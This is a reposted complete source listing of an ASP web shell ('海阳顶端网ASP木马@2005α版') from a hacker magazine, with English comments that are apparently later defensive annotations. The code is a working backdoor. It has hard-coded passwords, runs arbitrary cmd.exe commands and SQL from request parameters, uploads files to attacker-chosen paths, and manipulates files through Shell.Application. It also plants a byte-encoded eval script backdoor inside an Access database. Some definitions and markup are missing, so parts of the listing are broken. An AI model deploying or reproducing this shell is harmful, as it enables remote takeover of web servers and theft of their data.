[转载]海阳顶端网ASP木马@2005α版全部源代码

信息来源:黑客手册

<%@ LANGUAGE="VBSCRIPT" codepage ="936"
"密码第一个是makelove,第二个是haiyangtop.126.com,查找替换这两个单词就可以改成别的密码了%>



<%if err then%>


<%
end if %>


::::海阳顶端网ASP木马@2005α版::::
<%"上传代码因化境的太长,这完全是抄桂林老兵的,对此表示感谢--上传类定义
' Page-level setup for the upload parser defined below.
' NOTE(review): in this listing the original apostrophe comment markers appear as
' double quotes (extraction damage), so a line that begins with " is a comment, not code.
response.buffer=true
' The script's own URL, taken from the server variables.
filename=Request.ServerVariables("URL")
' Raises the ASP script timeout to 5000 seconds.
Server.ScriptTimeout=5000
' From here on a runtime error no longer stops the page; execution simply continues.
On Error Resume Next
' Shared stream: UpFile_Class.GetDate fills it, FileInfo_Class reads file bytes back out of it.
Dim oUpFileStream
' UpFile_Class: hand-written multipart/form-data parser behind this web shell's upload
' feature. GetDate copies the whole request body into the shared ADODB.Stream
' oUpFileStream and splits it on the multipart boundary into text fields (Form) and
' file parts (File).
' NOTE(review): lines that begin with a double quote are the original apostrophe
' comments, damaged by extraction; they are left byte-identical here.
' Defender note: the parser depends on ADODB.Stream and Scripting.Dictionary being
' creatable from ASP, and it performs no check on file name, extension or content type.
Class UpFile_Class
' Form: field name -> text value. File: field name -> FileInfo_Class instance.
Dim Form,File
' Parses the current request body.
'   RetSize - largest accepted body size in bytes; a value of 0 or less disables the limit.
' Assigns 1 to Err when the body is empty and 2 when it is larger than RetSize.
Public Sub GetDate (RetSize)
  ' (original comment: "declare variables")
  "定义变量
 Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
 Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
 Dim iFindStart,iFindEnd
 Dim iFormStart,iFormEnd,sFormName
  ' (original comment: "code starts")
  "代码开始
 If Request.TotalBytes < 1 Then
  Err = 1
  Exit Sub
 End If
 If RetSize > 0 Then
  If Request.TotalBytes > RetSize Then
  Err = 2
  Exit Sub
  End If
 End If
 ' CompareMode 1 is text comparison, so field names are matched case-insensitively.
 Set Form = Server.CreateObject ("Scripting.Dictionary")
 Form.CompareMode = 1
 Set File = Server.CreateObject ("Scripting.Dictionary")
 File.CompareMode = 1
 Set tStream = Server.CreateObject ("Adodb.Stream")
 ' Type 1 = binary stream, Mode 3 = read/write.
 Set oUpFileStream = Server.CreateObject ("Adodb.Stream")
 oUpFileStream.Type = 1
 oUpFileStream.Mode = 3
 oUpFileStream.Open
 ' The complete request body is buffered in memory in one read.
 oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
 oUpFileStream.Position = 0
 RequestBinDate = oUpFileStream.Read
 iFormEnd = oUpFileStream.Size
 bCrLf = ChrB (13) & ChrB (10)
 ' (original comment: "get the separator between items") - the first line of the body
 ' is taken as the multipart boundary.
 "取得每个项目之间的分隔符
 sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1)
 iStart = LenB (sSpace)
 iFormStart = iStart+2
 ' (original comment: "split the items") - one loop iteration per multipart part.
 "分解项目
 Do
  ' The part header ends at the first blank line (CRLF CRLF).
  iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3
  tStream.Type = 1
  tStream.Mode = 3
  tStream.Open
  oUpFileStream.Position = iFormStart
  oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
  tStream.Position = 0
  ' Switch the scratch stream to text (Type 2) to decode the header as gb2312.
  tStream.Type = 2
  tStream.CharSet = "gb2312"
  sInfo = tStream.ReadText   
  ' Position of the next boundary, i.e. the end of this part's data.
  iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1
  ' Field name: the text between name=" and the next double quote. The search starts at
  ' fixed offsets (22 here, 45 for filename) rather than parsing the header properly.
  iFindStart = InStr (22,sInfo,"name=""",1)+6
  iFindEnd = InStr (iFindStart,sInfo,"""",1)
  sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
  If InStr (45,sInfo,"filename=""",1) > 0 Then
   ' File part: record metadata and byte offsets only; the bytes stay in oUpFileStream.
   Set oFileInfo = new FileInfo_Class
   iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
   iFindEnd = InStr (iFindStart,sInfo,"""",1)
   sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
   ' NOTE(review): path separators appear as "/" throughout this listing; the original
   ' may have used backslashes that were altered in extraction - unconfirmed.
   oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "/")+1)
   oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "/"))
   oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
   iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
   iFindEnd = InStr (iFindStart,sInfo,vbCr)
   ' Client-declared content type, stored as-is and never checked.
   oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
   oFileInfo.FileStart = iInfoEnd
   oFileInfo.FileSize = iFormStart -iInfoEnd -2
   oFileInfo.FormName = sFormName
   file.add sFormName,oFileInfo
  else
   ' Text field: decode the part body as gb2312 text.
tStream.Close
   tStream.Type = 1
   tStream.Mode = 3
   tStream.Open
   oUpFileStream.Position = iInfoEnd
   oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
   tStream.Position = 0
   tStream.Type = 2
   tStream.CharSet = "gb2312"
   sFormValue = tStream.ReadText
   ' Repeated field names are joined with ", ".
   If Form.Exists (sFormName) Then
    Form (sFormName) = Form (sFormName) & ", " & sFormValue
    else
    form.Add sFormName,sFormValue
   End If
  End If
  tStream.Close
  ' Skip over the boundary and its CRLF to the next part header.
  iFormStart = iFormStart+iStart+2
 ' The loop stops only when the position lands exactly on the end of the body.
 Loop Until (iFormStart+2) = iFormEnd
 RequestBinDate = ""
 Set tStream = Nothing
End Sub
End Class
' FileInfo_Class: metadata for one uploaded file part. The bytes themselves remain in
' the shared oUpFileStream; FileStart and FileSize locate them there.
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
' Writes the file part to Path on the server's file system.
' Defender note: Path is whatever the caller passes in, and SaveToFile option 2
' overwrites an existing file, so this can replace any file the web application
' identity is allowed to write. Tight NTFS write permissions on the web root and
' file-integrity monitoring are the relevant controls.
Public Function SaveToFile (Path)
 ' Failures (for example access denied) are swallowed; nothing is reported to the caller.
 On Error Resume Next
 Dim oFileStream
 Set oFileStream = CreateObject ("Adodb.Stream")
 ' Type 1 = binary stream, Mode 3 = read/write.
 oFileStream.Type = 1
 oFileStream.Mode = 3
 oFileStream.Open
 oUpFileStream.Position = FileStart
 oUpFileStream.CopyTo oFileStream,FileSize
 oFileStream.SaveToFile Path,2
 oFileStream.Close
 Set oFileStream = Nothing
End Function
' Returns the raw bytes of the file part without writing them anywhere.
Public Function FileDate
 oUpFileStream.Position = FileStart
 FileDate = oUpFileStream.Read (FileSize)
 End Function
End Class
%>
<% if Request("passwordlcx")="makelove" then
' First of two hard-coded password checks in this file; the second one compares the
' form field "password" in the dispatcher further down.
' A request value named passwordlcx equal to the literal above sets a session flag and
' redirects back to the script's own URL.
' Defender note: Request(...) also searches the query string, so the parameter name
' passwordlcx can appear in web server access logs. The literal is usable as a
' file-scanning signature, but the header of this listing says both passwords are
' meant to be changed by find-and-replace, so do not rely on it alone.
session("passwordlcx")="lcx"
response.redirect Request.ServerVariables("URL")
' Session flag not set: the page section that follows (HTML stripped in this listing) is sent.
elseif session("passwordlcx")=""then
%>














<%else%>
<%
' Upload handler, reached with up=yes in the request once the session flag is set.
' Defender note: a multipart POST to an .asp URL carrying up=yes is a log signature of
' this handler; the destination path is supplied entirely by the client.
if request("up")="yes" then
  set upload=new UpFile_Class
  ' Request body capped at 1024*1024 bytes.
  upload.GetDate (1024*1024)
  for each formName in upload.file
  set file=upload.file(formName)
  if file.FileSize>0 then
' Destination comes from the posted form field "filepath"; it is not validated.
savepath=upload.form("filepath")
  file.SaveToFile savepath
' The message below reports success without checking whether the write succeeded,
' and echoes savepath into the page without HTML encoding.
response.write "上传成功!上传后的路径为"&savepath&"
"
response.write "

返回上一页
"
  end if
  set file=nothing
  next
  set upload=nothing
  ' NOTE(review): showerr is not defined anywhere in the visible listing.
  showerr()
  response.end
end if
%>
<%
' Clears the "password" cookie and redirects to the URL held in the page-level
' variable url (assigned from the URL server variable in the dispatcher).
function out()
Response.Cookies("password")=""
response.redirect ""&url&""
End Function%>
<%"-------------------搜索文件函数------------------
' Set-up for the file search feature: errors are suppressed, the search term is read
' from the request value SearchString, and the hit counter starts at zero.
on error resume next
SearchString = Request("SearchString")
count=0
' Returns True when the text of file f contains s (case-insensitive) and tries to
' return a page title through the title argument.
' NOTE(review): objfsolhn is not declared in the visible listing; it is presumably a
' file-system object declared in markup that extraction removed - confirm.
Function SearchFile( f, s, title )
Set fo = objfsolhn.OpenTextFile(f)
content = fo.ReadAll"读全部文本到content
fo.Close
SearchFile = inStr(1, content, S, vbTextCompare)>0 "从第一个字符开始检查content里面是否有S
If SearchFile Then"如果有,则提出文件TITLE存入变量
' NOTE(review): the two search literals below are empty and the line carries a stray
' <br>; the +7 offset two lines down suggests they were title tags lost in extraction.
pos1 = InStr(1, content, "", vbTextCompare)<br>pos2 = InStr(1, content, "", vbTextCompare)
title = ""
If pos1 > 0 And pos2 > 0 Then"取TITLE标记中间的字符
title = Mid( content, pos1 + 7, pos2 - pos1 - 7 )
End If
End If
End Function
' Builds the result line for one matching file. As the listing stands the return value
' is just the file's path wrapped in a list marker; title is defaulted from the file
' name but not used in the output (the line that used it is commented out).
Function FileLink( f, title )
vPath =f.Path"取路径
If title = "" Then title = f.Name"做链接
"FileLink = "" & title & ""
FileLink = vPath
FileLink = "
    ·" & FileLink & "
"
End Function
' Recursively walks folder fd and prints every script file whose content contains s.
' Only the extensions asp, asa, cer and cdx are examined.
' Defender note: the same four extensions are the ones to include when sweeping an
' IIS web root for planted script files; a later form in this listing labels the search
' as usable for locating existing ASP trojans.
Sub SearchFolder( fd, s )
found = False
For each f In fd.Files
' Extension = text after the last dot of the full path.
pos = InStrRev(f.Path, "." )
If pos > 0 Then
ext = Mid(f.Path, pos + 1 )
Else
ext = ""
End If
If LCase(ext) = "asp" or LCase(ext) = "asa" or LCase(ext) = "cer" or LCase(ext) = "cdx" Then
If SearchFile( f, s, title ) Then
Response.Write FileLink(f, title)
count=count+1
End If
End If
Next
' Descend into every subfolder; there is no depth limit.
For each sfd In fd.SubFolders
SearchFolder sfd, s
Next
End Sub"搜索结束%>
<%"-------------------------mssql的sql扩展开始---------------------------------
' SQL execution feature: runs a statement from the posted form field "SQL" against the
' connection string posted in the form field "strcon".
' Defender note: both values come straight from the client, so the reachable databases
' are whatever the web server host can connect to with the supplied credentials.
' Database-side auditing and network egress limits from the web tier apply here.
Dim strsql, objDBConn, objRS, intFieldCount, intCounter,strcon
strcon =trim(Request.form("strcon"))
strsql =trim(Request.form("SQL"))
' Only statements that do not start with "select" are handled in this branch.
if strSQL <> "" and lcase(left(trim(strsql),6))<>"select" Then
' The success text is written before the statement is executed, so it is printed
' whether or not execution succeeds; strsql is echoed without HTML encoding.
Response.Write "SQL命令: " & strsql & "成功运行
"
Set objDBConn = Server.CreateObject("ADODB.Connection")
 objDBConn.Open strcon
objdbconn.execute(strsql)
objDBConn.Close 
  Set objDBConn = Nothing
end if
"-----------------------------------数据库记录列表----------------------------------------
' Record listing for one table (op=db with both dbname and tablename supplied).
' Defender note: dbname is a client-supplied path or connection string, so any
' Jet/Access file readable by the web application identity can be opened.
DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="
strRootFolder = Server.MapPath("/")
scriptname = Request.ServerVariables("SCRIPT_NAME")  
if request("op")="db" and request("dbname")<>"" and request("tablename")<>"" then
dbname=trim(request("dbname"))
tablename=request("tablename")
Set objConn = Server.CreateObject("ADODB.Connection")
' A value containing "Info=False" is used as a complete connection string; anything
' else is treated as a file path and prefixed with the Jet provider string.
if instr(dbname,"Info=False")>0 then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
' OpenSchema 20 is the table schema rowset, filtered to objects of type TABLE.
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
' Never true here: the enclosing condition already requires tablename to be non-empty.
if tablename="" then tablename=objTableRS("Table_Name").Value
%>

 
  
<%=objfsolhn.GetFilename(dbname)%>

   

   
    <%Do While Not objTableRS.EOF%>
    
     
    
    <%objTableRS.MoveNext
Loop%>
   
3 "><%=objTableRS("Table_Name").Value%>

  

   
    
     
<%=tablename%>
      

       
        
         

           ">
          



<%dim mysql,i,j
j=1
mysql="Select Top 10 * From ["&tablename&"]"
Set objRS=objConn.Execute(mysql)
For i=0 to objRs.Fields.Count-1
Response.write""
Next
Response.write ""
if objrs.eof then
else
DO While NOT objRS.Eof
Response.write ""
%>
<%
For i=0 to objRs.Fields.Count-1
Response.write""
Next
Response.write""
objRS.MoveNext
j=j+1
Loop
end if
set objRs = nothing
set objTableRS = nothing
objConn.Close
set objConn = nothing
%>
"&objRS.Fields(i).name&"
"
If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then
response.write " "
else
 Response.write Server.HTMLEncode(objRs.Fields(i).value)
end if
Response.write"

最多显示10条记录,要察看更多记录请使用SQL命令




<%
Response.End
end if
%>
<%
"----------------------------数据库对象列表---------------------------------------------
' Object listing (op=db with only dbname supplied): enumerates the tables of the
' database, and further down their columns.
if request("op")="db" and request("dbname")<>"" then
dbname=trim(request("dbname"))
Set objConn = Server.CreateObject("ADODB.Connection")
"objConn.ConnectionString = DBDriver & dbname
' Same rule as the record listing: "Info=False" marks a complete connection string,
' otherwise dbname is treated as a Jet database file path.
if instr(dbname,"Info=False")>0 then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
' OpenSchema 20 is the table schema rowset, filtered to objects of type TABLE.
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
%>

 
  
  
<%=objfsolhn.GetFilename(dbname)%>

   

   
    <%Do While Not objTableRS.EOF%>
    
     
    
    <%objTableRS.MoveNext
Loop
objTableRS.MoveFirst%>
   
3 "><%=objTableRS("Table_Name").Value%>

  
执行SQL命令

   

   <%While Not objTableRS.EOF%>
   
    
     
     
<%Set objColumnRS = objConn.OpenSchema(4,Array(Empty, Empty, objTableRS("Table_Name").Value))
    While Not objColumnRS.EOF
    iLength = objColumnRS("Character_Maximum_Length")
iPrecision = objColumnRS("Numeric_Precision")
      iScale = objColumnRS("Numeric_Scale")
iDefaultValue = objColumnRS("Column_Default")
        If IsNull(iLength) then iLength = " "
      If IsNull(iPrecision) then iPrecision = " "
If IsNull(iScale) then iScale = " "
If IsNull(iDefaultValue) then iDefaultValue = " "%>
     
     
     
     
     
     
    
    <%objColumnRS.MoveNext
Wend
objTableRS.MoveNext
Set objColumnRS = Nothing
Response.write "
"
Wend
objTableRS.Close
Set objTableRS = Nothing
objConn.Close
Set objConn = Nothing
%>
<%=objTableRS("Table_Name").Value%>
字段名 数据类型字段大小精度是否允许为空默认值
<%=objColumnRS("Column_Name")%><%=fieldtype(objColumnRS("Data_Type"))%><%=iLength%><%=iPrecision%>
      <%If objColumnRS("Is_Nullable") then
Response.Write "是"
      else
      Response.write "否"
End If%>
     
<%=iDefaultValue%>

<%
Response.End
end if
%>
<%
"----------------------------执行SQL命令---------------------------------------------
' SQL console (op=sql): opens the client-named database; later in this section the
' request value "cmd" is passed to objConn.Execute unchanged and the result set is
' printed with Server.HTMLEncode applied to each field value.
' Defender note: requests carrying op=sql together with dbname and cmd values are a
' log signature of this feature.
if request("op")="sql" then
dbname=trim(request("dbname"))
Set objConn = Server.CreateObject("ADODB.Connection")
"objConn.ConnectionString = DBDriver & dbname
if instr(dbname,"Info=False")>0 then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
' j counts the rows printed for the executed command.
j=0
%>

 
  
  
<%=objfsolhn.GetFilename(dbname)%>

   

   
    <%Do While Not objTableRS.EOF%>
    
     
    
    <%objTableRS.MoveNext
Loop%>
   
3 "><%=objTableRS("Table_Name").Value%>

  

   

   
    
     
    
   


       
 ">
       

   

   
    
<%if request("cmd")<>"" then
mysql=request("cmd")
Set objRS=objConn.Execute(mysql)
if objrs.state = 1 then
For i=0 to objRs.Fields.Count-1
Response.write""
Next
Response.write ""
if objrs.eof then
%>
<%else
DO While NOT objRS.Eof
Response.write ""
%>
<%
For i=0 to objRs.Fields.Count-1
Response.write""
Next
Response.write""
objRS.MoveNext
j=j+1
Loop
end if
set objRs = nothing
end if
end if
set objTableRS = nothing
objConn.Close
set objConn = nothing
%>
  
"&objRS.Fields(i).name&"
"
If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then
response.write " "
else
 Response.write Server.HTMLEncode(objRs.Fields(i).value)
end if
Response.write"

   

   <%if request("cmd")<>"" then response.Write("命令执行成功,返回 "&j&" 条记录")%>
 

<%
Response.End
end if
%>
<%
' Second password gate and request dispatcher for the file-system part of the shell.
' Defender note: after one successful password post, the only authentication state is
' a client cookie named "password" with the fixed value "allen". A deployed copy should
' therefore be treated as usable by anyone who knows that value, not only by whoever
' planted it. The request value "id" with edit / upload / dir / down / inject selects
' the feature, which gives a recognisable pattern in access logs.
url= Request.ServerVariables("URL")
' A non-empty but wrong password clears the cookie and redirects (see out()).
if trim(request.form("password"))<>"" and trim(request.form("password"))<>"haiyangtop.126.com" then call out()
if trim(request.form("password"))="haiyangtop.126.com" then
response.cookies("password")="allen"
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() "密码错误
response.end "停止运行
end if
select case request("id")
case "edit"
call edit()
case "upload"
' NOTE(review): no sub named upload is defined in the visible listing.
call upload()
case "dir"
call dir()
case "down"
call downloadFile(request("path"))
case "inject"
call inject()
case else
call main()
end select
end if
' login(): the page shown before the second password is accepted. It opens by probing
' 26 COM classes for availability and version.
' NOTE(review): the array ObjTotest is not defined in the visible listing, so the
' ProgIDs being probed cannot be named from here.
' Defender note: this is environment fingerprinting - it tells the operator which
' server components can be created from ASP. Restricting which COM classes the web
' application identity may instantiate limits both this probe and the features below.
sub login()
for i=0 to 25
on error resume next
IsObj=false
VerObj=""
dim TestObj
set TestObj=server.CreateObject(ObjTotest(i,0))
' -2147221005 is 0x800401F3 (invalid class string); any other outcome is counted as
' "component present".
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
ObjTotest(i,2)=IsObj
ObjTotest(i,3)=VerObj
next
%>


























<%
' Crude CPU benchmark: times 500000 trivial additions and formats the elapsed time
' (Timer difference in seconds) as milliseconds with one decimal place. The result is
' shown on the server information panel together with host name, IP and script path.
dim t1,t2,lsabc,thetime
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
%>


服务器名 <%=Request.ServerVariables("SERVER_NAME")%>
服务器IP <%=Request.ServerVariables("LOCAL_ADDR")%>
服务器时间 <%=now%>
本文件绝对路径 <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
服务器操作系统 <%=Request.ServerVariables("OS")%>
服务器运算速度测试 <%=thetime%> 毫秒




" name=form9 target="newwin" method="GET">

 
   
   
mdb+sql数据库操作:


<%" -------------------在ACESS数据库里写入asp后门开始-----------------------
' The listing's own section header describes this as writing an ASP backdoor into an
' Access database. The code opens the Jet database named by the request value dbname,
' creates a table notdownloadlcx with a single OLE-object column of the same name, and
' adds a row; the statement after this block appends a byte string that spells out a
' server-side script element evaluating a posted form field.
' NOTE(review): no condition guards this section in the visible code, so it appears to
' run on every call of login(); with On Error Resume Next an empty dbname would fail
' silently - confirm against an intact copy.
' Defender note: a table named notdownloadlcx inside an Access file is an indicator of
' this feature. The technique presumably matters only when the database file is served
' under a script-mapped extension (not shown here); keeping database files outside the
' web root and unmapped removes that exposure.
DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="
dbname=request("dbname")
Set objConn = Server.CreateObject("ADODB.Connection")
objConn.ConnectionString = DBDriver & dbname
objConn.Open
objConn.execute("create table notdownloadlcx(notdownloadlcx oleobject)")
set rs=server.createobject("adodb.recordset")
  sql="select * from notdownloadlcx"
' Cursor type 1 and lock type 3: an updatable recordset.
rs.open sql,objConn,1,3
rs.addnew
  rs("notdownloadlcx").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("""))& chrB(asc("#"))& chrB(asc("""))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("""))& chrB(asc("""))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">")))
  rs.update
  rs.close
set rs=nothing
objConn.close
set objCon_n=nothing
"-----------------------------------------------------数据库操作结束------------------------------------
"---------------------免fso代码写文件开始针对中文-----------------------------------
' File write that avoids the file-system object: the posted text (textlcx) is written
' to the posted path (pathlcx) by way of a Shell.Application shortcut that is pointed
' at cmd.exe and then invoked.
' Defender note - observable artefacts of this feature, all visible in the code below:
'   * Shell.Application created from an ASP page;
'   * a shortcut file c:/a.lnk written and then deleted by its own command line;
'   * cmd.exe started on behalf of the web server process.
' Process-creation auditing on the web server and denying the web application identity
' access to Shell.Application and cmd.exe are the relevant controls.
pathlcx=trim(Request.form("pathlcx"))
textlcx=trim(Request.form("textlcx"))
if textlcx<>"" and pathlcx<>"" then
' cmd.exe metacharacters in the text are prefixed with ^ so that echo emits them literally.
textlcx=replace(textlcx,">","^>")
textlcx=replace(textlcx,"<","^<")
textlcx=replace(textlcx,"&","^&")
textlcx=replace(textlcx,chr(34),"^"&chr(34))
textlcx=replace(textlcx,chr(10),"^"&chr(10))
textlcx=replace(textlcx,chr(13),"^"&chr(13))
set shell=server.createobject("shell.application")
' An existing shortcut from the Default User start menu (Chinese-language Windows path)
' is loaded only to obtain a link object that can be edited and saved elsewhere.
set shellfolder=shell.namespace("C:/Documents and Settings/Default User/「开始」菜单/程序/附件")
set shellfolderitem=shellfolder.parsename("记事本.lnk")
set objshelllink =shellfolderitem.getlink
objshelllink.path="cmd.exe"
objshelllink.arguments="/c echo "&textlcx&">"&pathlcx&" &&del c:/a.lnk"
objshelllink.save("c:/a.lnk")
shell.namespace("c:/").items.item("a.lnk").invokeverb
end if
"--------------免fso代码写文件结束-----------免fso表单开始-------------%>

<%"-------------免fso表单单代码结束------------%>



" method="post">
 输入要浏览的目录,最后要加/


copy
目录或文件(不要加目录和文件名)


move
目录或文件(不要加目录和文件名)

路径:
程序: 不可以加参数
CMD命令对话框
路径与文件名


要生成的文件内容,不可以有回车:
<% ok=Request("ok")
' Command execution: the request value "ok" is appended to "cmd.exe /c " and run, and
' the command's standard output is written into the page.
' NOTE(review): oScriptlhn is not declared in the visible listing; the .exec call
' suggests a Windows Script Host shell object - confirm.
' Defender note: cmd.exe as a child of the web server worker process is the primary
' host-side signal; the parameter name "ok" is the request-side one.
response.write oScriptlhn.exec ("cmd.exe /c "& ok).stdout.readall
%>








 





?up=yes enctype="multipart/form-data">
已有物理目录+文件名:
   
     文件地址:




<%"-----------------免fso代码shell.application开始------------------
' Four file-system features built on Shell.Application only (no file-system object):
' directory listing, copy, move and program launch. Every path comes from posted form
' fields (text, text1..text6) and none is validated.
' Defender note: all four depend on the web application identity being able to create
' Shell.Application; removing that ability disables this whole group.
DSnXA = Request.Form("text")  "目录浏览
if (DSnXA <> "") then
set shell=server.createobject("shell.application") "建立shell对象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
' One output line per item: full path and size, written without HTML encoding.
for each co in foditems
response.write "" & co.path & "-----" & co.size & "
"
next
end if
%>
<%
DSnXA1 = Request.Form("text1") "目录拷贝,不能进行文件拷贝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") "建立shell对象
set fod1=shell1.namespace(DSnXA2)
' Split the source at its last "/" into parent folder (path) and item name (path2).
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="/" then
  path=left(DSnXA1,i-1)
  exit for
end if
next
' A bare drive such as "c:" gets its separator back.
if len(path)=2 then path=path & "/"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
' Printed unconditionally; the result of the copy is not checked.
response.write "command completed success!"
end if
%>
<%
DSnXA3 = Request.Form("text3")  "目录移动
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") "建立shell对象
set fod1=shell2.namespace(DSnXA4)
' Same source-path split as in the copy feature above.
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="/" then
  path=left(DSnXA3,i-1)
  exit for
end if
next
if len(path)=2 then path=path & "/"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
DSnXA5 = Request.Form("text5")  "执行程序要指定路径
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") "建立shell对象
' Invokes the default verb of item text6 inside folder text5, i.e. opens or starts it.
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
%>





   
 

Enter Password:



<%end sub%>
<% end if %>
<%sub main()"---------------------免fso代码结束,fso代码开始---------------------
' Start of main(): works out which directory the file browser shows.
' lpath is the client-supplied path (default "/"); cpath is the path actually used.
' Defender note: with attrib=true the client value is used as an absolute file-system
' path, so browsing is not confined to the web root; otherwise it is mapped through
' Server.MapPath.
urlpath=Request.ServerVariables("SERVER_NAME")
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
%>


bgColor=#b8b8b8 border=0 class="noborder">


height=22 colspan="4" bgcolor="#EEEEEE" >切换盘符:
<%
For Each thing in objfsolhn.Drives
Response.write ""&thing.DriveLetter&"盘:     "
NEXT
%>  本机局域网地址:
<%= "//" & oScriptNetlhn.ComputerName & "/" & oScriptNetlhn.UserName %>
 

<%
if request.form("submit1")="返回免fso页面" then
call out()
end if%>












<% If (IsObject(oFilelcx)) Then
Response.Write Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call objfsolhn.DeleteFile(szTempFile, True)
End If %>
<%
Set fd = objfsolhn.GetFolder(Request("path88")&"/")
If SearchString <> "" Then
Response.Write "

如下脚本文件内嵌入搜索的" & SearchString & "关键字:

"
SearchFolder fd,SearchString
End If
%>




文件名 (鼠标移到文件名可以查看给文件的属性)




"
Next
end if
Response.write"
<%
if Request("attrib")="true" then
response.write "点击切换到相对路径编辑模式"
else
response.write "点击切换到绝对路径编辑模式"
end if
%> 路径: <%=cpath%>  当前浏览目录:<%=lpath%>


浏览目录:

〖请用绝对路径〗
 

<%
' Second command-execution path: the posted form field ".CMD" is run through cmd.exe
' with its output redirected to a temporary file in the root of drive C:. Earlier in
' the page that file, if open, is read with HTML encoding and then deleted.
' Defender note: short-lived files with system-generated temporary names directly under
' c:/ created by the web server process, together with cmd.exe child processes, are
' the artefacts of this feature.
DSnXA = Request.Form(".CMD")
If (DSnXA <> "") Then
szTempFile = "c:/" & objfsolhn.GetTempName( )
' Window style 0 and wait-on-return True: hidden, and the page blocks until it finishes.
Call oScriptlhn.Run ("cmd.exe /c " & DSnXA & " > " & szTempFile, 0, True)
' Opened for reading (1), no create, ASCII (0).
Set oFilelcx = objfsolhn.OpenTextFile (szTempFile, 1, False, 0)
End If%>
" method="POST" name=userdata>


?up=yes enctype="multipart/form-data">
已有物理目录+文件名:
   
文件地址:


" method="post">
关键字搜索: type="submit" value="可用于检索存在的asp木马">
on_Submit="return crfile(newfile.filename.value);">


〖新建文件和新建目录不能同名〗

<%
dim theFolder,theSubFolders
if objfsolhn.FolderExists(cpath)then
